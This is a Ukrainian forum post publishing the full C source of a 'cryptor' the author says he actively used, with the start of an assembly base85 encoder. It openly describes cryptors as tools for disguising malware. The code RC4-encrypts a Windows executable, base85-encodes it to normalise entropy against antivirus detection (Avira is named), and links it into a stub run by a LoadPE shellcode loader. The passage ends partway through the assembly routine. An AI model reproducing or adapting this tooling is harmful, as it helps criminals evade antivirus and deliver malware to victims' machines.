1

Тема: [Джерельний код] Криптор

Нижче викладений джерельний код криптора, який активно мною використовувався. Єдиний пароль на всі архіви - replace
Трішки довідки:

Криптор (від англ. Cryptor — шифрувальник) — назва ряду програм для криптозахисту виконуваних файлів. Використовуються переважно вірусописцями й хакерами для маскування шкідливого програмного забезпечення.

З укр. вікі знов моя стаття
Особливістю цього криптора є:

 • Підтримка розширень

 • Генерація стабів окреме від криптування

 • Підтримка TLS

 • Використання лінкера для створення виконуваного файла

 • Мутація коду декриптора

 • Нормалізація ентропії файла

 • Невеликий стаб

 • Криптографічні функції виконані у вигляді пікоду для програмної віртуальної машини

Криптор складається з двох частин - власне криптора, який створює кінцевий криптований виконуваний файл зі вказаного початкового файлу і обраного стабу, і генератора стабів. Цей криптор є консольною програмою, яка одержує параметри з командного рядку і вертає власні помилки чи інформаційні повідомлення туди ж.
Наведені нижче стаби вже використовувалися, тому антивірус має на них реагувати. Для запуску початкового файлу, використовується мій LoadPE шеллкод з підтримкою розширень, а софтверна ВМ оця.

Власне криптор

Криптор писаний мовою C (Pelles C, але має без змін компілюватися і у Visual C++) і для парсингу json даних використовується бібліотека parson.

Головний файл криптора - packer.c

Одчинити
#include <sys/stat.h>
#include <sys/types.h>
#include <stdio.h>
#include <time.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#include <windows.h>
#include <Shlwapi.h>
#include "parson.h"

#define LOADPE_BINARY_FILE "loadpe.bin"
#define LOADPE_PLUGINS_DIRECTORY "plugins"

extern void WINAPI ascii85encode (LPVOID pSrc, LPVOID pDst, DWORD dwSrcLen);
int openPluginFile (char* fPath);

#pragma pack(push, 4)
struct strucShellcodeData {
  DWORD dwOriginalFileSize;
  DWORD dwImageBase;
  DWORD dwShellcodeLen;
  DWORD dwDeepOfStack;
  DWORD pOriginalTLSIndex;
};
#pragma pack(pop)

#pragma pack(push, 1) 
struct _3B1P_PLUGIN_HEADER {
  DWORD  signature;
  WORD  wSize;
  DWORD  pReturn;
  DWORD  pLoadPEData;
  WORD  pEntryPoint;
  DWORD  dwPluginID;
};
#pragma pack(pop)

#define MAX_PLUGIN_NAME_LEN 0x20
#define PLUGINS_LEN 0x80

void** pPluginList;
DWORD dwPluginListCount = 0;
HANDLE hFind;
WIN32_FIND_DATA FindFileData;
UCHAR hasIcon = 0;
UCHAR hasPlugins = 0;
char  szIconPath [MAX_PATH];
char  szPlugins [PLUGINS_LEN] = "";
UINT  dwIconResourceID = 0, dwImageDataResourceID = 0;
DWORD dwLoadPEChainSize;
LPVOID pLoadPEChain;
DWORD dwOriginalFileSize;
LPVOID pOriginalFile;
char  pass[0x40];
WORD  wPassLen;
char  sPath[0x400] = "";
char  szStubDirPath[MAX_PATH];
char  szStubSettingsJSONPath[MAX_PATH];
char  szStubObjPath[MAX_PATH];
char  szStubEntryObjPath[MAX_PATH];
char  szTempDir[MAX_PATH];
char  szSessionDirName[0x20];
char  szSessionDir[MAX_PATH];
char  szSessionDataFilePath[MAX_PATH];
char  szExternalResourcePath[MAX_PATH];
UCHAR alphabet[85];
struct strucShellcodeData shellcodeData;
UINT  iCreationTime;
DWORD dwRawDataSize, dwPackedDataSize;
LPVOID pRawData, pPackedData;
DWORD dwOffsetLoadPE, dwAllocateMemory;
DWORD dwDeepOfStack;
DWORD dwCryptedFileSize;
LPVOID pCryptedFile;
DWORD dwOverlaySize = 0;
LPVOID pOverlay = NULL;
BYTE  flagPackOverlay = FALSE, flagSaveOverlay = TRUE;
LPBYTE pTLSRawData = NULL;
DWORD dwTLSRawDataSize = 0;
DWORD pOriginalTLS;
DWORD pOriginalTLSIndex = 0;
DWORD hasExternalResource = 0;

DWORD szHashROR7XOR(char* s) {
  DWORD temp = 0, sumHash=0;
  int szLen = strlen(s);
  for (int i=0; i<=szLen; i++) { 
      temp = (temp >> 7) | (temp << 25);
    sumHash ^= temp; 
    temp = (temp & 0xFFFFFF00) | s[i];
  }
  return (sumHash);
}

VOID fprintfArrHex(FILE* f, LPBYTE arr, DWORD size) {
  for (DWORD i = 0; i<size; i++) {
    if (i) {
      fprintf (f, ", ");
    }
    fprintf (f, "0x%X", arr[i]);
  }
}

DWORD initLoadPE(char *szFileLoadPE, char *szPluginDirectory) {
  char szPlugin[MAX_PATH];
  FILE *fMainShellcode;
  char szPluginDirectoryMask[MAX_PATH];
  if (!(fMainShellcode = fopen(szFileLoadPE, "rb"))) return(FALSE);
  fseek(fMainShellcode, 0, SEEK_END); 
  dwLoadPEChainSize = ftell(fMainShellcode);
  fseek(fMainShellcode, 0, SEEK_SET); 
  pLoadPEChain = malloc(dwLoadPEChainSize);
  fread(pLoadPEChain, dwLoadPEChainSize, 1, fMainShellcode);
  fclose(fMainShellcode);
  strcpy(szPluginDirectoryMask, szPluginDirectory);
  strcat(szPluginDirectoryMask, "\\*.plugin");
  if((hFind = FindFirstFile(szPluginDirectoryMask, &FindFileData)) != INVALID_HANDLE_VALUE) {
    do {
      strcpy(szPlugin, szPluginDirectory);
      strcat(szPlugin, "\\");
      strcat(szPlugin, FindFileData.cFileName);
      openPluginFile(szPlugin);
    } while (FindNextFile(hFind, &FindFileData));
    FindClose(hFind);
  }
  return(TRUE);
}

LPVOID buildFileAttachmentBlock (PCHAR szFileAttach, PCHAR szName) {
  FILE *fAttach;
  DWORD dwNameSize = strlen(szName), dwAttachSize;
  if (!(fAttach = fopen(szFileAttach, "rb"))) return(NULL);
  fseek(fAttach, 0, SEEK_END); 
  dwAttachSize = ftell(fAttach);
  fseek(fAttach, 0, SEEK_SET); 
  LPBYTE pResult = malloc(dwAttachSize+dwNameSize+0xC);
  *((LPWORD) pResult) = 0xA77A;
  *((LPDWORD) ((LPBYTE) pResult + 0x2)) = dwAttachSize + dwNameSize + 0xC;
  *((LPBYTE) pResult + 0x6) = dwNameSize + 0x1;
  memcpy((pResult + 0x7), szName, dwNameSize + 0x1);
  *((LPDWORD) (pResult + 0x8 + dwNameSize)) = dwAttachSize;
  fread((pResult + 0x8 + dwNameSize), dwAttachSize, 1, fAttach);
  fclose(fAttach);  
  return((LPVOID) pResult);
}

LPVOID patchMemSpot32B(LPVOID pMem, DWORD dwLen, DWORD dwSpot, LPVOID pMemR, DWORD dwMemRSize) {
   LPVOID pResult = NULL;
   __asm {
    pusha
    mov   edi, DWord Ptr [pMem]
    mov   esi, DWord Ptr [dwLen]
    lea   esi, [edi+esi-0x4]
    mov   eax, DWord Ptr [dwSpot]
  up:
    cmp   eax, DWord ptr [edi]
    jz   ok
    cmp   edi, esi
    jz   err
    inc   edi
    jmp   up
  ok:
    mov   DWord Ptr [pResult], edi
  err:
    popa
  }
  if (pResult) memcpy(pResult, pMemR, dwMemRSize);
  return(pResult);
}

int openPluginFile(char* fPath) {
 FILE *fPlugin;
 long bPluginLen;
 struct _3B1P_PLUGIN_HEADER zvir;
 if (!(fPlugin = fopen(fPath, "rb"))) {
  return(FALSE);
 }
 fseek(fPlugin, 0, SEEK_END); 
 bPluginLen = ftell(fPlugin);
 fseek(fPlugin, 0, SEEK_SET); 
 if (bPluginLen < sizeof(zvir)) {
  fclose(fPlugin);
  return(FALSE);
 }
 char *binaryContent;
 binaryContent = (char *)malloc(bPluginLen);
 if (!binaryContent) {
  fclose(fPlugin);
  return(FALSE);
 }
 fread(binaryContent, bPluginLen, 1, fPlugin);
 char binSign[4];
 memcpy(binSign, binaryContent, 4);
 if (strncmp(binSign, "3B1P", 0x4) != 0) {
  fclose(fPlugin);
  free(binaryContent);
  return(FALSE);
 }
 memcpy(&zvir, binaryContent, sizeof(zvir) );
 if ((bPluginLen <= zvir.wSize+2) || (zvir.wSize == 0)) {
  fclose(fPlugin);
  free(binaryContent);
  return(FALSE);
 }
 char *binPluginName = (char*)calloc(1, MAX_PLUGIN_NAME_LEN);
 strncpy(binPluginName, binaryContent+zvir.wSize, MAX_PLUGIN_NAME_LEN);
 DWORD hashPluginName = szHashROR7XOR(binPluginName);
 free(binPluginName);
 if (hashPluginName != zvir.dwPluginID) {
  fclose(fPlugin);
  free(binaryContent);
  return(FALSE);
 }
 dwPluginListCount++;
 pPluginList = realloc(pPluginList, dwPluginListCount*sizeof(void *));
 pPluginList[dwPluginListCount-1] = binaryContent;
 return (TRUE);
}

int buildLoadPEChain (char* szPlugins) {
  struct _3B1P_PLUGIN_HEADER *zvir;
  char *pluginName;
  DWORD boolTLS = FALSE;
  pluginName = strtok (szPlugins, ",");
  while (!boolTLS) {
    if (!pluginName) {
      boolTLS = TRUE;
      if (pOriginalTLS) {
        pluginName = "STATICTLS";
      } else continue;
    }
    int iBreakFlag = FALSE;
    printf (" [*] USE %s PLUGIN\n", pluginName);
    for (DWORD m = 0; m < dwPluginListCount; m++) {
      zvir = (struct _3B1P_PLUGIN_HEADER *) pPluginList[m];
      if ((zvir -> dwPluginID) == szHashROR7XOR(pluginName)) {
        pLoadPEChain = realloc(pLoadPEChain, dwLoadPEChainSize+zvir->wSize);
        memcpy((LPBYTE)pLoadPEChain+dwLoadPEChainSize, pPluginList[m], zvir->wSize);
        dwLoadPEChainSize+=zvir->wSize;
        iBreakFlag = TRUE;
        break;
      }
    }
    if (!iBreakFlag) return (FALSE);
    pluginName = strtok(NULL, ",");
  }
  pLoadPEChain = realloc(pLoadPEChain, dwLoadPEChainSize+0x4);
  memcpy((LPBYTE)pLoadPEChain+dwLoadPEChainSize, "4APA", 0x4);
  dwLoadPEChainSize+=0x4;
  shellcodeData.dwShellcodeLen = dwLoadPEChainSize;
#ifdef DEBUG
  FILE* fLoadPE = fopen("loadpe.bin", "wb+");
  fwrite(pLoadPEChain, dwLoadPEChainSize, 1, fLoadPE);
  fclose(fLoadPE);
#endif
  return (TRUE);
}

int parseOptionalParam (char *szparam) {
 char *token;
 char ** res = NULL;
 token = strtok( szparam, "|");
 int n_spaces = 0, i, n;
 while (token) {
  res = realloc (res, sizeof (char*)*++n_spaces);
  if (res == NULL) exit (-1);
  res[n_spaces-1] = token;
  token = strtok (NULL, "|");
 };
 for (i = 0; i < (n_spaces); ++i) {
  char ** command = NULL;
  int command_params = 0;
  printf("res[%d]=%s\n", i, res[i]);
  token = strtok(res[i], "?");
  if (token) {
   while (token) {
    command = realloc (command, sizeof (char*)*++command_params);
    command[command_params-1] = token;
    token = strtok(NULL, "?");
   }
  } else {
   command[0] = token;
   command_params++;
  }
  if (!strncmp(command[0], "ICON", 4)) {
   if (command_params != 2) {
    free (command);
    free (res);
    return(FALSE);
   }
   hasIcon = 1;
   strncpy(szIconPath, command[1], 0x200);
  } else if (!strcmp(command[0], "PLUGINS")) {
   if (command_params != 2) {
    free (command);
    free (res);
    return(FALSE);
   }
   hasPlugins = 1;
   strncpy(szPlugins, command[1], PLUGINS_LEN);
  } else if (!strcmp(command[0], "OVERLAY")) {
   if (command_params < 2) {
    free(command);
    free(res);
    return(FALSE);
   }
   for (int z=1; z<command_params-1; z++) {
    if (!strcmp(command[z], "PACK")) {
     flagPackOverlay = TRUE;
    } else if (!strcmp(command[z], "NOTPACK")) {
     flagPackOverlay = FALSE;
    } else if (!strcmp(command[z], "REMOVE")) {
     flagSaveOverlay = FALSE;
    } else if (!strcmp(command[z], "SAVE")) {
     flagSaveOverlay = TRUE;
    } else {
     free(command);
     free(res);
     return(FALSE);
    }
   }
  } else if (!strcmp(command[0], "RESFILE")) {
   if (command_params != 2) {
    free(command);
    free(res);
    return(FALSE);
   }
   hasExternalResource = TRUE;
   strncpy(szExternalResourcePath, command[1], 0x200);
  } else {
   free (command);
   free (res);
   return(FALSE);  
  };
  for (n = 0; n < command_params; ++n) {
   printf("r[%d]=%s\n", n, command[n]);
  } 
 };
 free (res);
 return(TRUE);
}

int readStubConfig (char *szpathstub) {
 JSON_Array *array;
 JSON_Value *rootVal = json_parse_file(szpathstub);
 if (json_value_get_type(rootVal) != JSONObject) {
  json_value_free(rootVal); 
  return(FALSE);
 }
 JSON_Object *rootObj = json_value_get_object (rootVal);
 JSON_Value *passVal = json_object_dotget_value (rootObj, "pass.val");
 if (json_value_get_type(passVal) != JSONString) {
  json_value_free(rootVal); 
  return(FALSE);
 }
 const char *szPass = json_object_dotget_string (rootObj, "pass.val");
 strncpy(pass, szPass, 0x40);
 wPassLen = strlen(szPass);
 JSON_Value *iconResNumVal = json_object_dotget_value (rootObj, "icon.resnum");
 if (json_value_get_type(iconResNumVal) != JSONNumber) {
  json_value_free(rootVal); 
  return(FALSE);
 }
 dwIconResourceID = (DWORD) json_object_dotget_number (rootObj, "icon.resnum");
 JSON_Value *valOffsetLoadPE = json_object_dotget_value (rootObj, "loadpe.offset");
 if (json_value_get_type(valOffsetLoadPE) != JSONNumber) {
  json_value_free(rootVal); 
  return(FALSE);
 }
 dwOffsetLoadPE = (DWORD) json_object_dotget_number (rootObj, "loadpe.offset");
 JSON_Value *valImageDataResourceIDVal = json_object_dotget_value (rootObj, "datapeimage.resnum");
 if (json_value_get_type(valImageDataResourceIDVal) != JSONNumber) {
  json_value_free(rootVal);
  return(FALSE);
 }
 dwImageDataResourceID = json_object_dotget_number (rootObj, "datapeimage.resnum");
 array = json_object_dotget_array(rootObj, "alphabet.val");
 if (json_array_get_count(array)!=85) {
  json_value_free(rootVal);
  return(FALSE);
 }
 JSON_Value *valDeepOfStub = json_object_dotget_value (rootObj, "stackdepth");
 if (json_value_get_type(valDeepOfStub) != JSONNumber) {
  json_value_free(rootVal);
  return(FALSE);
 }
 dwDeepOfStack = json_object_dotget_number (rootObj, "stackdepth")+0x88+0x54;
 unsigned int z = 0;
 for(int i=0; i< 85; i++) {
  z = json_array_get_number(array, i);
  if (z > 255) {
   json_value_free(rootVal);
   return(FALSE);
  }
  alphabet[i]=z;
 }
 json_value_free(rootVal); 
 return TRUE;
}

LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen) {
  INT a, b = 0;
  BYTE s[256];
  BYTE swap;
  DWORD dwCount;
  for(a = 0; a < 256; a++) {
    s[a] = a;
  }
  for(a = 0; a < 256; a++) {
    b = (b + s[a] + lpKey[a % dwKeyLen]) % 256;
    swap = s[a];
    s[a] = s[b];
    s[b] = swap;
  }
  for(dwCount = 0; dwCount < dwBufLen; dwCount++) {
    a = (a + 1) % 256;
    b = (b + s[a]) % 256;
    swap = s[a];
    s[a] = s[b];
    s[b] = swap;
    lpBuf[dwCount] ^= s[(s[a] + s[b]) % 256];
  }
  return lpBuf;
}

UINT getSizeOfImage (PVOID pImgPE) {
 IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
 IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
 return (Image_Optional_Header->SizeOfImage);
}

UINT getImageBase (PVOID pImgPE) {
 IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
 IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
 return (Image_Optional_Header->ImageBase);
}

UINT getSizeOfStackCommit (PVOID pImgPE) {
 IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
 IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
 return (Image_Optional_Header->SizeOfStackCommit);
}

UINT getSizeOfStackReserve (PVOID pImgPE) {
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
  IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
  return (Image_Optional_Header->SizeOfStackReserve);
}

void setSizeOfStackCommit (PVOID pImgPE, DWORD dwStackCommit) {
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
  IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
  Image_Optional_Header->SizeOfStackCommit = dwStackCommit;
}

/*
DWORD OffsetToRVA(PVOID pImgPE, DWORD offset) {
  DWORD scount = 3;
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *) pImgPE;
  IMAGE_SECTION_HEADER *is_hdr = (IMAGE_SECTION_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew + sizeof(IMAGE_NT_HEADERS));
  for(unsigned i = 0; i < scount;i++)  // Find section holding the Offset
    if((offset >= is_hdr[i].PointerToRawData) && (offset <= is_hdr[i].PointerToRawData +is_hdr[i].SizeOfRawData)) {
      return (offset+is_hdr[i].VirtualAddress-is_hdr[i].PointerToRawData);}
  return 0;
}
*/

 /*----------------------------------------------------------*
 *
 * RVAToOffset: Convert value from RVA to file offset.
 *----------------------------------------------------------*/
 DWORD RVAToOffset(PVOID pImgPE, DWORD dwRVA) {
    PIMAGE_NT_HEADERS32 pNtHdr = (PIMAGE_NT_HEADERS32) ((BYTE*)pImgPE+((IMAGE_DOS_HEADER *) pImgPE)->e_lfanew);
   int i;
   WORD wSections;
   PIMAGE_SECTION_HEADER pSectionHdr;
 
   /* Map first section */
   pSectionHdr = IMAGE_FIRST_SECTION(pNtHdr);
   wSections = pNtHdr->FileHeader.NumberOfSections;
 
   for (i = 0; i < wSections; i++)
   {
     if (pSectionHdr->VirtualAddress <= dwRVA)
       if ((pSectionHdr->VirtualAddress + pSectionHdr->Misc.VirtualSize) > dwRVA) {
         dwRVA -= pSectionHdr->VirtualAddress;
         dwRVA += pSectionHdr->PointerToRawData;
         return (dwRVA);
       }
     pSectionHdr++;
   }
   return (-1);
 }
 
 /*----------------------------------------------------------*
 *
 * OffsetToRVA: Convert value from file offset to RVA.
 *----------------------------------------------------------*/
 DWORD OffsetToRVA(PVOID pImgPE, DWORD dwOffset) {
    PIMAGE_NT_HEADERS32 pNtHdr = (PIMAGE_NT_HEADERS32) ((BYTE*)pImgPE+((IMAGE_DOS_HEADER *) pImgPE)->e_lfanew);
   int i;
   WORD wSections;
   PIMAGE_SECTION_HEADER pSectionHdr;
   /* Map first section */
   pSectionHdr = IMAGE_FIRST_SECTION(pNtHdr);
   wSections = pNtHdr->FileHeader.NumberOfSections;
   for (i = 0; i < wSections; i++)  {
     if (pSectionHdr->PointerToRawData <= dwOffset)
       if ((pSectionHdr->PointerToRawData + pSectionHdr->SizeOfRawData) > dwOffset) {
         dwOffset -= pSectionHdr->PointerToRawData;
         dwOffset += pSectionHdr->VirtualAddress;
         return (dwOffset);
       }
     pSectionHdr++;
   }
   return (-1);
}

DWORD hasTLS (PVOID pImgPE) {
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
  IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
  return((DWORD)Image_Optional_Header->DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress);
}

DWORD getTrueRawSize(PVOID pImgPE) {
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *) pImgPE;
  DWORD scount = ((IMAGE_NT_HEADERS *)((BYTE*)pImgPE+Image_Dos_Header->e_lfanew))->FileHeader.NumberOfSections;
  IMAGE_SECTION_HEADER *is_hdr = (IMAGE_SECTION_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew + sizeof(IMAGE_NT_HEADERS));
  DWORD dwTrueRawSize = is_hdr[scount-1].PointerToRawData + is_hdr[scount-1].SizeOfRawData;
  return(dwTrueRawSize);
}

VOID patchTLS (PVOID pImgPE, DWORD dwRVATLS, DWORD dwSizeTLS) {
  IMAGE_DOS_HEADER * Image_Dos_Header = (IMAGE_DOS_HEADER *)pImgPE;
  IMAGE_OPTIONAL_HEADER * Image_Optional_Header = (IMAGE_OPTIONAL_HEADER *) ((BYTE*)pImgPE+Image_Dos_Header->e_lfanew+24);
  Image_Optional_Header->DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress = dwRVATLS;
  Image_Optional_Header->DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].Size = dwSizeTLS;
}

/*** Command line options:
  * [0] PACKER.EXE
  * [1] INPUT PE EXE FILE
  * [2] OUTPUT PE EXE FILE
  * [3] STUB DIRECTORY
  * [4] [OPTIONAL PARAMETERS]
  ***/

int main(int argc, char *argv[]) {
  FILE *finp, *fPackedData, *frc;
  DWORD dwSizeOfImage, dwSizeOfStackCommit, dwSizeOfStackReserve, dwImageBase;
  if (argc == 1) {
    puts ("PACKER input_executable_file output_executable_file stub_directory [optional_config_parameter]\nRTFM!!!\n");
    return(0);
  } else if (argc > 5 || argc < 4) {
    puts("ERROR: Invalid parameter number");
    return(1);
  } else if ((argc == 5) && (!parseOptionalParam(argv[4]))) {
    puts("ERROR: Invalid optional parameter");
    return(1);
  };
  if (!PathIsDirectory(argv[3])) {
    puts("ERROR: Invalid stub directory");
    return(1);    
  }
  strncpy(szStubDirPath, argv[3], MAX_PATH);
  strncpy(szStubSettingsJSONPath, szStubDirPath, MAX_PATH);
  PathAppend(szStubSettingsJSONPath, "settings.json");
  initLoadPE(LOADPE_BINARY_FILE, LOADPE_PLUGINS_DIRECTORY);
  strncpy(szStubObjPath, szStubDirPath, MAX_PATH);
  PathAppend(szStubObjPath, "stub.obj");
  strncpy(szStubEntryObjPath, szStubDirPath, MAX_PATH);
  PathAppend(szStubEntryObjPath, "entry.obj");
  GetTempPath(MAX_PATH, szTempDir);
  strncpy(szSessionDir, szTempDir, MAX_PATH);
  iCreationTime = (time(NULL)^clock());
  sprintf (szSessionDirName, "%X", iCreationTime);
  PathAppend (szSessionDir, szSessionDirName);  
  CreateDirectory (szSessionDir, NULL);
  if (!readStubConfig(szStubSettingsJSONPath)) {
    puts("ERROR: Invalid stub configuration file");
    return(1);
  };
  if (!(finp = fopen(argv[1], "rb"))) {
    puts(argv[1]);
    puts("ERROR: CAN'T OPEN SOURCE PE EXE");
    return(0); 
  };
  fseek(finp, 0, SEEK_END);
  dwOriginalFileSize = ftell(finp);
  fseek(finp, 0, SEEK_SET);
  pOriginalFile = malloc(dwOriginalFileSize);
  fread(pOriginalFile, 1, dwOriginalFileSize, finp);
  fclose(finp);
  dwSizeOfImage = getSizeOfImage(pOriginalFile);
  dwSizeOfStackCommit = getSizeOfStackCommit(pOriginalFile);
  dwSizeOfStackReserve = getSizeOfStackReserve(pOriginalFile);
  dwImageBase = getImageBase(pOriginalFile);
  pOriginalTLS = hasTLS(pOriginalFile);
  DWORD dwTrueRawSize = getTrueRawSize(pOriginalFile);
  if (dwTrueRawSize < dwOriginalFileSize) {
    dwOverlaySize = dwOriginalFileSize - dwTrueRawSize;
    printf(" [+] Overlay data detected. It`s length is %d\n", dwOverlaySize);
    pOverlay = malloc(dwOverlaySize);
    memcpy(pOverlay, (LPBYTE)pOriginalFile + dwOriginalFileSize - dwOverlaySize, dwOverlaySize);
    if (!flagPackOverlay) {
      dwOriginalFileSize -= dwOverlaySize;
      pOriginalFile = realloc(pOriginalFile, dwOriginalFileSize);
    } 
    if (!flagSaveOverlay) {
      free(pOverlay);
      pOverlay = NULL;
      dwOverlaySize = 0;
    }
  }
  SetCurrentDirectory(szSessionDir);
  if (!(fPackedData = fopen("data.bin", "wb"))) {
    puts("ERROR: CAN'T CREATE TEMP FILE");
    fclose(finp);
    return(0);
  };
/*  dwSizeOfImage = getSizeOfImage(pOriginalFile);
  dwSizeOfStackCommit = getSizeOfStackCommit(pOriginalFile);
  dwSizeOfStackReserve = getSizeOfStackReserve(pOriginalFile);
  dwImageBase = getImageBase(pOriginalFile);
*/
  shellcodeData.dwImageBase = dwImageBase;
  shellcodeData.dwOriginalFileSize = dwOriginalFileSize;
  shellcodeData.dwDeepOfStack = dwDeepOfStack;
  shellcodeData.pOriginalTLSIndex = 0;
  buildLoadPEChain (szPlugins);
  dwRawDataSize = (dwOriginalFileSize+dwLoadPEChainSize+0x3) & 0xFFFFFFC;
  dwPackedDataSize = 5 * dwRawDataSize / 4;
  dwAllocateMemory = dwOffsetLoadPE + dwRawDataSize;
  pOriginalTLS = hasTLS(pOriginalFile);
  if (pOriginalTLS) {
    LPBYTE pTLS = (LPBYTE) pOriginalFile+RVAToOffset(pOriginalFile, pOriginalTLS);
    dwTLSRawDataSize = ((PIMAGE_TLS_DIRECTORY) pTLS)->EndAddressOfRawData - ((PIMAGE_TLS_DIRECTORY)pTLS)->StartAddressOfRawData;
    shellcodeData.pOriginalTLSIndex = pOriginalTLSIndex = ((PIMAGE_TLS_DIRECTORY) pTLS)->AddressOfIndex;
    pTLSRawData = malloc (dwTLSRawDataSize);
    DWORD dwTLSRawDataRVA = ((PIMAGE_TLS_DIRECTORY) pTLS)->StartAddressOfRawData-dwImageBase;
    DWORD dwOffsetTLSRawData = RVAToOffset(pOriginalFile, dwTLSRawDataRVA);
    memcpy(pTLSRawData, (LPBYTE)pOriginalFile + dwOffsetTLSRawData, dwTLSRawDataSize);
    printf(" [+] has static TLS: 0x%X\n [+] size of raw data is 0x%X\n", pOriginalTLS, dwTLSRawDataSize);
  }
  patchMemSpot32B(pLoadPEChain, dwLoadPEChainSize, 0xBEA51F3D, &shellcodeData, sizeof(shellcodeData));
  pRawData = malloc(dwRawDataSize);
  memcpy(pRawData, pLoadPEChain, dwLoadPEChainSize);
  memcpy((LPBYTE)pRawData+dwLoadPEChainSize, pOriginalFile, dwOriginalFileSize);
#ifdef DEBUG
  FILE *frawdata = fopen("rawdata.dat", "wb");
  fwrite(pRawData, 1, dwRawDataSize, frawdata);
  fclose(frawdata);
#endif
  RC4((LPBYTE)pRawData, (LPBYTE)pass, dwRawDataSize, wPassLen);
#ifdef DEBUG
  FILE *frc4 = fopen("data_debug_rc4.dat", "wb");
  fwrite(pRawData, 1, dwRawDataSize, frc4);
  fclose(frc4);
#endif
  pPackedData = malloc (dwPackedDataSize);
  ascii85encode (pRawData, pPackedData, dwRawDataSize);
  fwrite (pPackedData, 1, dwPackedDataSize, fPackedData);
  fclose (fPackedData);
  int iSpace = dwSizeOfImage - (0x2000+dwPackedDataSize);
  if (iSpace > 0) {
    FILE *fbss = fopen("space.asm", "wb");
    fprintf(fbss, "format MS COFF\n\nsection '.bss' readable writeable\n\n rb %d\n", iSpace);
    fclose(fbss);
    system("C:\\DEV\\FASM\\FASM.EXE space.asm");
  }
  fPackedData = fopen("data.asm", "wb");
  fprintf(fPackedData, "format MS COFF\n");
  if (iSpace > 0) {
    fprintf(fPackedData, "\nsection '.bss' readable writeable\npublic buffer\nbuffer rb %d\n", iSpace);
  }
  fprintf(fPackedData, "\nsection '.data' data readable writeable\n public crdata\ncrdata:\n file 'data.bin'\n" );
  fclose(fPackedData);
  frc = fopen("resource.rc", "wb");
  if (hasIcon) {
    CopyFile((const char*)szIconPath, "icon.ico", FALSE);
    fprintf(frc, "0x86 ICON \"ICON.ICO\"\n");
  }
  fclose(frc);
  system("PORC.EXE resource.rc");
  system("C:\\DEV\\FASM\\FASM.EXE data.asm");
  char linkparam[MAX_PATH];
  sprintf(linkparam, "POLINK.EXE resource.res user32.lib kernel32.lib gdi32.lib data.obj %s %s ", szStubEntryObjPath, szStubObjPath);
  if (hasExternalResource) strcat(linkparam, szExternalResourcePath);
  if (iSpace>0) strcat(linkparam, " space.obj ");
  sprintf(linkparam, "%s /SUBSYSTEM:WINDOWS /ALIGN:4096 /OUT:crypted.exe /BASE:0x%X /MERGE:.rdata=.text", linkparam, dwImageBase);
  puts(linkparam);
  system(linkparam);
  CopyFile("crypted.exe", argv[2], FALSE);
  FILE* fcrypted = fopen(argv[2], "rb");
  fseek(fcrypted, 0, SEEK_END);
  dwCryptedFileSize = ftell(fcrypted);
  fseek(fcrypted, 0, SEEK_SET);
  pCryptedFile = malloc(dwCryptedFileSize);
  fread(pCryptedFile, dwCryptedFileSize, 1, fcrypted);
  fclose(fcrypted);
  patchMemSpot32B(pCryptedFile, 0x2C00, 0xACADBE71, &dwAllocateMemory, 0x4);
  patchMemSpot32B(pCryptedFile, 0x2C00, 0xAB7E6CA9, &dwPackedDataSize, 0x4);
  setSizeOfStackCommit(pCryptedFile, dwSizeOfStackCommit);
  fcrypted = fopen(argv[2], "wb");
  fwrite(pCryptedFile, dwCryptedFileSize, 1, fcrypted);
  if (dwOverlaySize) {
    fwrite(pOverlay, dwOverlaySize, 1, fcrypted);
  }
  fclose(fcrypted);
  return(0);
};

Файл base85enc.inc - реалізація мовою асемблера кодування даних (трохи спрощеним) алгоритмом BASE85знов моя стаття. Воно потрібне для нормаліізації статистики вихідного файлу (ентропії секції даних), на яку погано реагують антивіруси (особливо avira).

Одчинити
format MS COFF

include '%FASMINC%\win32a.inc'

section '.text' code readable executable

public ascii85_encode as '_ascii85encode@12'
extrn '_alphabet' as alphabet

proc ascii85_encode_dword pMem:DWord, dwVal:DWord
  pusha
  mov  eax, [dwVal]
  mov  edi, 085d
  xor  ecx, ecx
  mov  esi, [pMem]
  lea  ebx, [alphabet]
  xor  edx, edx
  div  edi
  movzx ecx, Byte [ebx+edx]
  mov  Byte [esi], cl
  inc  esi
  xor  edx, edx
  div  edi
  movzx ecx, Byte [ebx+edx]
  mov  Byte [esi], cl
  inc  esi
  xor  edx, edx
  div  edi
  movzx ecx, Byte [ebx+edx]
  mov  Byte [esi], cl
  inc  esi
  xor  edx, edx
  div  edi
